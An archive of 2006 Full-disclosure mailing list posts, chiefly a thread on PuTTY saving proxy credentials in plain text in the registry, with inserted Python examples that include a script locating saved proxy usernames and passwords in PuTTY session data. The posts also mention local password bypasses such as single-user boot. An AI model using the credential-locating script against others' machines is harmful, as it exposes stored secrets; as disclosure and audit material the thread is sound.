http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Sorry, I shouldn't have implied that was only true of Windows. However, you CAN'T access encrypted data with physical drive access.

Matt Flaschen

>> Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.
>>
> Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.
>
> Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.
>
> So what's your point? That when you own the box you own the box?
>
> If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.
>
> Paul Schmehl ([EMAIL PROTECTED])
> Senior Information Security Analyst
> The University of Texas at Dallas
> http://www.utdallas.edu/ir/security/
Re: [Full-disclosure] RE : Putty Proxy login/password disclosure....(Answer from PUTTY Staff)
Could use the same passphrase for the proxy password and SSH keys?

Simon Tatham wrote:
> Matthew Flaschen <[EMAIL PROTECTED]> wrote:
>
>> Why can't you generate the encryption key from a passphrase?
>
> Because requiring the user to type in their passphrase at the start of the session in order to decrypt their proxy password is no more convenient than requiring them to type in the proxy password directly!
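The scheme Matthew Flaschen asks about in this sub-thread, and the cost Simon Tatham points to, written out as an added Python example that is not PuTTY code and was not posted by anyone in the thread: the proxy password is encrypted under a key derived from a passphrase with PBKDF2, so nothing stored on disk can decrypt it, and `unseal()` cannot run at session start until that passphrase is typed. The names (`seal`, `unseal`, `PBKDF2_ROUNDS`) and the sample values are the example's own assumptions. Only the standard library is used, so the cipher is HMAC-SHA256 in counter mode with a separate encrypt-then-MAC tag; in real software a vetted AEAD (AES-GCM from a maintained library) is the right choice.

```python
"""Added example, not PuTTY code: a proxy password sealed under a
passphrase-derived key. Nothing on disk can decrypt it, which is also why
the passphrase has to be typed every time the session starts."""
import hashlib
import hmac
import os
from typing import Tuple

PBKDF2_ROUNDS = 100_000  # assumption: raise as hardware allows
SALT_LEN = NONCE_LEN = 16
TAG_LEN = 32


def _derive_keys(passphrase: str, salt: bytes) -> Tuple[bytes, bytes]:
    """Derive independent encryption and MAC keys from one passphrase."""
    material = hashlib.pbkdf2_hmac(
        "sha256", passphrase.encode("utf-8"), salt, PBKDF2_ROUNDS, dklen=64
    )
    return material[:32], material[32:]


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 as a PRF in counter mode: block i = HMAC(key, nonce || i)."""
    blocks = []
    for counter in range((length + 31) // 32):
        blocks.append(
            hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        )
    return b"".join(blocks)[:length]


def seal(passphrase: str, proxy_password: str) -> bytes:
    """Encrypt the proxy password; the result is what a session record would hold.
    Layout: salt(16) || nonce(16) || ciphertext || tag(32)."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    enc_key, mac_key = _derive_keys(passphrase, salt)
    plaintext = proxy_password.encode("utf-8")
    stream = _keystream(enc_key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    return salt + nonce + ciphertext + tag


def unseal(passphrase: str, record: bytes) -> str:
    """Recover the proxy password. Raises ValueError on a wrong passphrase or a
    modified record; the tag is checked before any plaintext is produced."""
    if len(record) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("record too short")
    salt = record[:SALT_LEN]
    nonce = record[SALT_LEN:SALT_LEN + NONCE_LEN]
    ciphertext = record[SALT_LEN + NONCE_LEN:-TAG_LEN]
    tag = record[-TAG_LEN:]
    enc_key, mac_key = _derive_keys(passphrase, salt)
    expected = hmac.new(mac_key, salt + nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("wrong passphrase or tampered record")
    stream = _keystream(enc_key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream)).decode("utf-8")


if __name__ == "__main__":
    # Constructed values; the record is what would be saved with the session.
    record = seal("correct horse battery staple", "pr0xy-s3cret")
    print("stored:", record.hex())
    # Session start: the passphrase must be typed again to get the password back.
    print("recovered:", unseal("correct horse battery staple", record))
```

The trade-off Simon describes is the `unseal()` signature: the program cannot call it on its own, so the user types a secret at every session start either way. What the scheme does buy is that a copy of the saved session (registry export, backup, stolen profile) yields nothing without the passphrase, and a wrong passphrase or an edited record is rejected rather than decrypted to garbage.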
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Exactly. If you've managed to lose your root password, deal with the karma; don't make the system insecure by design with a "linux single" feature. Not that a lot of users don't forget their passwords anyway.

On Wed, 25 Oct 2006 23:57:15 +0530
Raj Mathur <[EMAIL PROTECTED]> wrote:

RM> On Wednesday 25 October 2006 23:14, cardoso wrote:
RM> > Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I taught them the trick and they usually stopped bragging about how secure Linux was.
RM>
RM> Can't do that in most modern distributions today -- they're configured to ask for root password before they give a single-user shell.
RM>
RM> Not that there aren't other ways around that restriction...
RM>
RM> -- Raju
RM>
RM> > On Wed, 25 Oct 2006 12:34:49 -0500
RM> > Paul Schmehl <[EMAIL PROTECTED]> wrote:
RM> >
RM> > PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote:
RM> > PS>
RM> > PS> > Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.
RM> > PS> >
RM> > PS> Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.
RM> > PS>
RM> > PS> Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.
RM> > PS>
RM> > PS> So what's your point? That when you own the box you own the box?
RM> > PS>
RM> > PS> If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.
RM> > PS>
RM>
RM> --
RM> Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/
RM> GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
RM> It is the mind that moves

-
Carlos Cardoso
http://www.carloscardoso.com <== semi-personal blog
http://www.contraditorium.com <== ProBlogging and digital culture

"You lost today, kid. But that doesn't mean you have to like it"
Re: [Full-disclosure] Putty Proxy login/password disclosure....
On Wednesday 25 October 2006 23:14, cardoso wrote:
> Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I taught them the trick and they usually stopped bragging about how secure Linux was.

Can't do that in most modern distributions today -- they're configured to ask for root password before they give a single-user shell.

Not that there aren't other ways around that restriction...

-- Raju

> On Wed, 25 Oct 2006 12:34:49 -0500
> Paul Schmehl <[EMAIL PROTECTED]> wrote:
>
> PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote:
> PS>
> PS> > Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.
> PS> >
> PS> Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.
> PS>
> PS> Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.
> PS>
> PS> So what's your point? That when you own the box you own the box?
> PS>
> PS> If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.
> PS>

--
Raj Mathur [EMAIL PROTECTED] http://kandalaya.org/
GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
It is the mind that moves
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of "linux single" at boot time. After a few hours begging for the admin password, I taught them the trick and they usually stopped bragging about how secure Linux was.

On Wed, 25 Oct 2006 12:34:49 -0500
Paul Schmehl <[EMAIL PROTECTED]> wrote:

PS> --On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote:
PS>
PS> > Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.
PS> >
PS> Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.
PS>
PS> Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.
PS>
PS> So what's your point? That when you own the box you own the box?
PS>
PS> If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.
PS>
PS> Paul Schmehl ([EMAIL PROTECTED])
PS> Senior Information Security Analyst
PS> The University of Texas at Dallas
PS> http://www.utdallas.edu/ir/security/

-
Carlos Cardoso
http://www.carloscardoso.com <== semi-personal blog
http://www.contraditorium.com <== ProBlogging and digital culture

"You lost today, kid. But that doesn't mean you have to like it"
Re: [Full-disclosure] Putty Proxy login/password disclosure....
--On Wednesday, October 25, 2006 10:24:11 -0400 [EMAIL PROTECTED] wrote:

> Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.

Unix offers no security against local users either. If I can sit at the console, I can log in in single-user mode, mount the drives rw and edit /etc/passwd all day.

Furthermore, I can take any hard drive, with any file system on it, and with the right tools I can read everything on the drive, even deleted stuff.

So what's your point? That when you own the box you own the box?

If you first have to own the box to get to the information, then it's not a vulnerability. It's not best practice, but it's not a vulnerability.

Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
[Full-disclosure] Cisco Security Advisory: Cisco Security Agent for Linux Port Scan Denial of Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Security Agent for Linux Port Scan Denial of Service

Advisory ID: cisco-sa-20061025-csa

http://www.cisco.com/warp/public/707/cisco-sa-20061025-csa.shtml

Revision 1.0

For Public Release 2006 October 25 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco Security Agent (CSA) for Linux contains a denial of service vulnerability involving port scans. By performing a port scan against a system running a vulnerable version of CSA, it is possible to cause the system to become unresponsive. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) ship with a vulnerable CSA version.

There are workarounds for this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20061025-csa.shtml

Affected Products
=================

Vulnerable Products
+------------------

The following CSA versions are vulnerable to the port scanning issue:

  * CSA version 4.5 for Linux (standalone and managed) prior to Hotfix 4.5.1.657
  * CSA version 5.0 for Linux (standalone and managed) prior to Hotfix 5.0.0.193

The following Cisco products include a standalone CSA for Linux version which are also vulnerable to this issue:

  * Cisco Unified CallManager (CUCM) 5.0 versions including 5.0(4)
  * Cisco Unified Presence Server (CUPS) 1.0 versions including 1.0(2)

Products Confirmed Not Vulnerable
+--------------------------------

The following CSA Agent versions are not vulnerable to the port scanning issue:

  * CSA version 5.1 (standalone and managed) for Linux
  * All CSA versions (standalone and managed) for Windows
  * All CSA versions (standalone and managed) for Solaris

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

Cisco Security Agent (CSA) provides threat protection for server and desktop computing systems.

CSA for Linux is vulnerable to a denial of service attack that may be triggered during the identification of network port scans. By running a port scan with specific options, it is possible to cause excessive system resource consumption resulting in a denial of service. It is possible to mitigate this vulnerability by restricting network access to vulnerable systems to trusted networks.

This issue is not a Linux operating system issue. CSA versions for other operating systems (Windows, Solaris) are not affected by this vulnerability.

This issue is documented in Cisco Bug ID CSCse98684.

Cisco Unified CallManager 5.0 versions, including 5.0(4), ship with a vulnerable version of CSA. A new CallManager Options Package (COP) file is available to update the CSA version on CallManager 5.0(4). Future versions of CallManager will include the updated CSA version.

This issue is documented in Cisco Bug ID CSCse97601.

Cisco Unified Presence Server 1.0 versions, including 1.0(2), ship with a vulnerable version of CSA. A new COP file is available to update the CSA version on CUPS 1.0(2). Future versions of CUPS will include the updated CSA version.

This issue is documented in Cisco Bug ID CSCsg40052.

Impact
======

Successful exploitation of the port scan vulnerability against a Linux system running a vulnerable version of CSA may cause the system to become unresponsive due to resource exhaustion while a port scan is underway. This may result in the failure of critical processes and remote network connectivity. Repeated port scans may result in a prolonged denial of service.

If a CUCM or CUPS system running a vulnerable CSA version is scanned, voice operations may become unavailable for the duration of the port scan.

Software Version and Fixes
==========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance.

CSA for Linux
+------------

  +-----------------------+-----------------------+
  | Affected Software     | Fixed Software        |
  | Version               | Version               |
  |-----------------------+-----------------------|
  | CSA Hotfix prior to   | CSA Hotfix            |
  | 4.5.1.657             | 4.5.1.657             |
  |-----------------------+-----------------------|
  | CSA Hotfix prior to   | CSA Hotfix            |
  | 5.0.0.193             | 5.0.0.194 *           |
  +-----------------------+-----------------------+

  * CSA Hotfix 5.0.0.194 deprecates CSA Hotfix 5.0.0.193.

Fixed CSA software can be downloaded at http://www.cisco.com/cgi-bin/tablebuild.pl/cs
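As an added example (not Cisco's code and not part of the advisory), a small Python check that maps the "CSA for Linux" fixed-version table above onto a version comparison, so a list of CSA hotfix versions can be triaged against this advisory. The thresholds are the advisory's own; the host names in the sample inventory are made up, and release branches the advisory does not mention are reported as unknown rather than guessed.

```python
"""Added example, not Cisco code: triage CSA for Linux hotfix versions
against cisco-sa-20061025-csa.

Per the advisory: 4.5 hotfixes below 4.5.1.657 and 5.0 hotfixes below
5.0.0.193 are affected (5.0.0.194 supersedes 5.0.0.193); CSA 5.1 for
Linux is confirmed not vulnerable. Other branches are left as unknown."""
from typing import Dict, Optional, Tuple

Version = Tuple[int, ...]

# First fixed hotfix per affected release branch (major, minor).
FIXED_BY_BRANCH: Dict[Tuple[int, int], Version] = {
    (4, 5): (4, 5, 1, 657),
    (5, 0): (5, 0, 0, 193),
}
# Branches the advisory explicitly clears.
NOT_VULNERABLE_BRANCHES = {(5, 1)}


def parse_version(text: str) -> Version:
    """Turn '4.5.1.657' into (4, 5, 1, 657); reject anything non-numeric."""
    parts = text.strip().split(".")
    if not all(part.isdigit() for part in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in parts)


def is_vulnerable(text: str) -> Optional[bool]:
    """True if affected, False if fixed or cleared, None if the advisory
    says nothing about this release branch."""
    version = parse_version(text)
    if len(version) < 2:
        return None
    branch = (version[0], version[1])
    if branch in NOT_VULNERABLE_BRANCHES:
        return False
    fixed = FIXED_BY_BRANCH.get(branch)
    if fixed is None:
        return None
    # Tuple comparison is lexicographic and a shorter tuple sorts before its
    # longer prefix, so a bare '4.5' (no hotfix at all) counts as affected.
    return version < fixed


def audit(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'vulnerable' / 'fixed' / 'unknown' for a {host: version} inventory."""
    labels = {True: "vulnerable", False: "fixed", None: "unknown"}
    return {host: labels[is_vulnerable(ver)] for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory; these are not real hosts.
    sample = {"cucm-1": "5.0.0.100", "lab-csa": "4.5.1.657", "web-3": "5.1.0.42"}
    for host, status in audit(sample).items():
        print(f"{host}: {status}")
```

Hosts reported as vulnerable are candidates for the advisory's workaround (restricting network access to trusted networks) until the hotfix or COP file is applied; the "unknown" result is deliberate, so that a version outside the table is checked by hand rather than silently treated as fixed.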
Re: [Full-disclosure] Putty Proxy login/password disclosure....
Windows offers no security against local users. It is trivial to boot to a program like ERD Commander and replace admin passwords. On the other hand, PuTTY is meant to protect against everyone; that's why it doesn't allow saved passwords. Thus, this seems like a vulnerability to me.

Matt Flaschen

Quoting Dave "No, not that one" Korn <[EMAIL PROTECTED]>:

> "Antoine SANTO" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED]
>
>> Hi,
>>
>> I come to report a little strange disclosure discovered by my co-worker Fx0day.
>>
>> When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.
>>
>> Strange to see a good SSH client storing plain clear text « hot » information!!
>
> The HKCU key is protected by an ACL; it is only accessible to the user, or to someone with admin rights. So it's not best practice, agreed, but it isn't a major vulnerability.
>
> cheers,
>   DaveK
> --
> Can't think of a witty .sigline today
Re: [Full-disclosure] RE : Putty Proxy login/password disclosure....(Answer from PUTTY Staff)
Why can't you generate the encryption key from a passphrase?

Matthew Flaschen

Antoine SANTO wrote:
>> Hi,
>>
>> I come to report a little strange disclosure discovered by my co-worker Fx0day.
>>
>> When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.
>>
>> Strange to see a good SSH client storing plain clear text « hot » information!!
>
> Unfortunately, there's no way to encrypt it securely, because there's nowhere safe to store an encryption key.
>
> Cheers,
> Simon
[Full-disclosure] RE : Putty Proxy login/password disclosure....(Answer from PUTTY Staff)
> Hi,
>
> I come to report a little strange disclosure discovered by my co-worker Fx0day.
>
> When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.
>
> Strange to see a good SSH client storing plain clear text « hot » information!!

Unfortunately, there's no way to encrypt it securely, because there's nowhere safe to store an encryption key.

Cheers,
Simon
--
Simon Tatham         "A cynic is a person who smells flowers and
<[EMAIL PROTECTED]>    immediately looks around for a coffin."
Re: [Full-disclosure] Putty Proxy login/password disclosure....
"Antoine SANTO" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED]
> Hi,
>
> I come to report a little strange disclosure discovered by my co-worker Fx0day.
>
> When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.
>
> Strange to see a good SSH client storing plain clear text « hot » information!!

The HKCU key is protected by an ACL; it is only accessible to the user, or to someone with admin rights. So it's not best practice, agreed, but it isn't a major vulnerability.

cheers,
  DaveK
--
Can't think of a witty .sigline today
Re: [Full-disclosure] RE : Putty Proxy login/password disclosure....
Did you report the finding to the author, so he can fix this issue?

Heiko

On Wed, October 25, 2006 07:15, Antoine SANTO wrote:
> For information, I use Version 0.58, which seems to be the latest release.
>
> Regards
> Antoine SANTO
>
> _
>
> Antoine SANTO
> Network and Security Administration
> MAAF Assurances Europex
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On behalf of Antoine SANTO
> Sent: Wednesday 25 October 2006 12:45
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Putty Proxy login/password disclosure
>
> Hi,
>
> I come to report a little strange disclosure discovered by my co-worker Fx0day.
>
> When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.
>
> Strange to see a good SSH client storing plain clear text « hot » information!!
>
> Regards
> Antoine SANTO
>
> _
>
> Antoine SANTO
> Network and Security Administration
> MAAF Assurances Europex

--
Regards
Heiko Zuerker
http://www.devil-linux.org
Re: [Full-disclosure] Windows Command Processor CMD.EXE Buffer Overflow
Peter Ferrie wrote:
>>> file://
>>> ?
>>
>> OK, I'll bite. Why are file:// URLs relevant to the discussion?
>
> It allows arbitrary data to be passed to CMD.EXE, without first owning the system.

No it doesn't. It passes arbitrary data to the windows gui shell exec function. It doesn't invoke cmd.exe. Unless you have an actual working example?

cheers,
  DaveK
--
Can't think of a witty .sigline today
Re: [Full-disclosure] [funsec] Who is n3td3v?
Dr. Neal Krawetz said: "The older n3td3v postings were by 3 people, not one person."

---

While I like the fact someone's analysed all this and come to a conclusion, I believe it's the wrong conclusion. In my opinion n3td3v was always one person. He's Scottish from Edinburgh, posted in various states of mind ranging from straight headed, to blindly drunk. Also you have to take into consideration that he could be a paranoid schizophrenic. OK so I'm no doctor or personality analyst, but it did look that way sometimes.

Also, the impression that there was more than one person was only ever given by himself. Starting a google group means fuck all, all I ever saw was listings of posts on all the mailing lists. That means nothing. I could start the colweb group now on google and claim to be a group of security specialists, doesn't mean it's true.

Also there were a couple of instances where people impersonated him, so that might muddy the water somewhat. Also it didn't help that he used 2 or 3 email addresses from time to time to get past blocking.

So I stick to my personal opinion of the great man -

1. One person
2. Good intentions overall
3. Not great communication skills (depends how drunk he is)
4. Too paranoid for his own good
5. Living in Edinburgh
6. Most likely Scottish

Cheers.

Col.
[Full-disclosure] RE : Putty Proxy login/password disclosure....
For information, I use Version 0.58, which seems to be the latest release.

Regards
Antoine SANTO

Antoine SANTO
Network and Security Administration
MAAF Assurances – Europex

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On behalf of Antoine SANTO
Sent: Wednesday 25 October 2006 12:45
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Putty Proxy login/password disclosure

Hi,

I come to report a little strange disclosure discovered by my co-worker Fx0day.

When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.

Strange to see a good SSH client storing plain clear text « hot » information!!

Regards
Antoine SANTO

Antoine SANTO
Network and Security Administration
MAAF Assurances – Europex
Re: [Full-disclosure] Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability
> Does anyone have more information on this issue?

Yes.

SecuriTeam is currently assisting a researcher with reporting this issue to Yahoo! security. Yahoo! security responded in record time, as they often do, and are working to resolve this potential security vulnerability. An official report with full credit to the researcher who discovered it will be released when the incident has been resolved.

A similar vulnerability was reported on the mailing lists a few months ago, which has not been fixed. SecuriTeam assisted the researcher and Yahoo! responded and fixed the issue in a matter of a day.

Yahoo! are very capable with security vulnerabilities in their software.

Thanks,

Gadi.

> snip
> http://www.securityfocus.com/bid/20625/discuss
> Yahoo! Messenger is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
>
> This vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely crash the server, denying further service to legitimate users.
>
> Yahoo! Messenger 8 with Voice is vulnerable.
> snip
>
> I could not find this vulnerability reported on any other place than bugtraq (say Secunia, iDefense, ISC).
>
> Thanks,
>
> - Siddhartha
[Full-disclosure] Putty Proxy login/password disclosure....
Hi,

I come to report a little strange disclosure discovered by my co-worker Fx0day.

When you save session information under PuTTY and you need a proxy for a session, we can find in plain clear text the proxy auth login and password in the Windows registry.

Strange to see a good SSH client storing plain clear text « hot » information!!

Regards
Antoine SANTO

Antoine SANTO
Network and Security Administration
MAAF Assurances – Europex

Attachment: putty_hole.gif (GIF image)
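The report above says the proxy login and password sit in clear text in the registry alongside the saved session. As an added example, not part of the report and not PuTTY code, here is a Python audit that lists every saved session with a non-empty proxy password, read either from a `reg export` of HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions or from one of the per-session files Unix PuTTY keeps under ~/.putty/sessions/. The setting names (ProxyMethod, ProxyHost, ProxyPort, ProxyUsername, ProxyPassword) are PuTTY's own; the ProxyMethod numbering and the %XX escaping of session names are assumptions taken from my reading of PuTTY's sources, and the sample export is constructed.

```python
"""Added example, not PuTTY code: find saved PuTTY sessions that carry a
proxy username and password. Parses a .reg export of the Sessions key or
a ~/.putty/sessions/<name> file. ProxyMethod numbers and the %XX session
name escaping are assumptions from my reading of PuTTY's sources."""
import re
from typing import Dict, List
from urllib.parse import unquote

PROXY_METHODS = {0: "none", 1: "SOCKS4", 2: "SOCKS5", 3: "HTTP", 4: "Telnet", 5: "local command"}

SESSION_KEY = re.compile(
    r"^\[HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\(.+)\]$", re.IGNORECASE
)
DWORD_VALUE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')
STRING_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')

Session = Dict[str, object]


def parse_reg_export(text: str) -> Dict[str, Session]:
    """Return {session name: {value name: value}} for every PuTTY session key."""
    sessions: Dict[str, Session] = {}
    current = None  # session whose values are being read; None under unrelated keys
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            match = SESSION_KEY.match(line)
            current = unquote(match.group(1)) if match else None
            if current is not None:
                sessions[current] = {}
            continue
        if current is None or not line:
            continue
        match = DWORD_VALUE.match(line)
        if match:
            sessions[current][match.group(1)] = int(match.group(2), 16)
            continue
        match = STRING_VALUE.match(line)
        if match:
            # .reg files escape backslashes and double quotes inside strings.
            value = match.group(2).replace('\\"', '"').replace("\\\\", "\\")
            sessions[current][match.group(1)] = value
    return sessions


def parse_unix_session(filename: str, text: str) -> Session:
    """Parse one ~/.putty/sessions/<name> file (Key=value lines, decimal numbers)."""
    values: Session = {"_name": unquote(filename)}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            values[key] = int(value) if value.isdigit() else value
    return values


def find_saved_proxy_credentials(sessions: Dict[str, Session]) -> List[Dict[str, str]]:
    """Sessions whose ProxyPassword is non-empty, with what an auditor needs to act."""
    hits = []
    for name, values in sessions.items():
        if not values.get("ProxyPassword", ""):
            continue
        method = values.get("ProxyMethod", 0)
        hits.append({
            "session": name,
            "method": PROXY_METHODS.get(method, f"method {method}"),
            "proxy": f"{values.get('ProxyHost', '?')}:{values.get('ProxyPort', '?')}",
            "username": str(values.get("ProxyUsername", "")),
        })
    return hits


# Constructed sample of what `reg export HKCU\Software\SimonTatham\PuTTY\Sessions` yields.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\bastion%20(prod)]
"HostName"="bastion.example.net"
"ProxyMethod"=dword:00000003
"ProxyHost"="proxy.corp.example"
"ProxyPort"=dword:00000bb8
"ProxyUsername"="asanto"
"ProxyPassword"="Hunter2!"

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\lab]
"HostName"="10.0.0.5"
"ProxyMethod"=dword:00000000
"ProxyPassword"=""
"""

if __name__ == "__main__":
    for hit in find_saved_proxy_credentials(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"{hit['session']}: {hit['method']} proxy {hit['proxy']} as {hit['username']} (password saved)")
```

`reg export` writes UTF-16 with a byte-order mark, so read a real export with `open(path, encoding="utf-16")` before passing it to `parse_reg_export()`. Dave Korn's ACL point holds and cuts both ways: run the audit as the user who owns the sessions, and remember that anything else running as that user, or anyone who can read the profile's NTUSER.DAT offline, sees the same values.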